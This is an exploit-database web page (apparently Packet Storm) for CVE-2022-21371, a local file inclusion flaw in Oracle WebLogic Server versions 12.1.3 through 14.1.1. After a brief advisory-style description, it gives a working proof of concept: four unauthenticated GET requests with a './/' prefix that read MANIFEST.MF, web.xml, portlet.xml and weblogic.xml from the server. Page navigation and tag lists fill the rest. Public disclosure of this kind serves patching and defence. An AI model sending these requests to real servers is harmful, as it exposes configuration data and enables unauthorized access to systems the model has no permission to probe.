Oracle WebLogic Server 14.1.1.0.0 Local File Inclusion ≈ Packet Storm

Home^[1] Files^[2] News^[3] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371
# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.
# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (76,631)
• Arbitrary^[21] (14,941)
• BBS^[22] (2,859)
• Bypass^[23] (1,518)
• CGI^[24] (1,009)
• Code Execution^[25] (6,468)
• Conference^[26] (666)
• Cracker^[27] (797)
• CSRF^[28] (3,247)
• DoS^[29] (21,551)
• Encryption^[30] (2,319)
• Exploit^[31] (49,154)
• File Inclusion^[32] (4,121)
• File Upload^[33] (933)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,531)
• Intrusion Detection^[36] (844)
• Java^[37] (2,736)
• JavaScript^[38] (788)
• Kernel^[39] (5,904)
• Local^[40] (13,904)
• Magazine^[41] (586)
• Overflow^[42] (12,031)
• Perl^[43] (1,409)
• PHP^[44] (5,024)
• Proof of Concept^[45] (2,273)
• Protocol^[46] (3,232)
• Python^[47] (1,365)
• Remote^[48] (29,337)
• Root^[49] (3,428)
• Ruby^[50] (564)
• Scanner^[51] (1,628)
• Security Tool^[52] (7,633)
• Shell^[53] (3,014)
• Shellcode^[54] (1,192)
• Sniffer^[55] (877)
• Spoof^[56] (2,064)
• SQL Injection^[57] (15,868)
• TCP^[58] (2,345)
• Trojan^[59] (666)
• UDP^[60] (865)
• Virus^[61] (657)
• Vulnerability^[62] (30,146)
• Web^[63] (8,867)
• Whitepaper^[64] (3,700)
• x86^[65] (939)
• XSS^[66] (17,210)
• Other^[67]

File Archives

• January 2022^[68]
• December 2021^[69]
• November 2021^[70]
• October 2021^[71]
• September 2021^[72]
• August 2021^[73]
• July 2021^[74]
• June 2021^[75]
• May 2021^[76]
• April 2021^[77]
• March 2021^[78]
• February 2021^[79]
• Older^[80]

Systems

• AIX^[81] (423)
• Apple^[82] (1,853)
• BSD^[83] (368)
• CentOS^[84] (55)
• Cisco^[85] (1,909)
• Debian^[86] (5,947)
• Fedora^[87] (1,690)
• FreeBSD^[88] (1,241)
• Gentoo^[89] (4,149)
• HPUX^[90] (875)
• iOS^[91] (310)
• iPhone^[92] (108)
• IRIX^[93] (220)
• Juniper^[94] (67)
• Linux^[95] (41,360)
• Mac OS X^[96] (682)
• Mandriva^[97] (3,105)
• NetBSD^[98] (255)
• OpenBSD^[99] (476)
• RedHat^[100] (10,971)
• Slackware^[101] (941)
• Solaris^[102] (1,601)
• SUSE^[103] (1,444)
• Ubuntu^[104] (7,589)
• UNIX^[105] (9,014)
• UnixWare^[106] (182)
• Windows^[107] (6,262)
• Other^[108]

© 2020 Packet Storm. All rights reserved.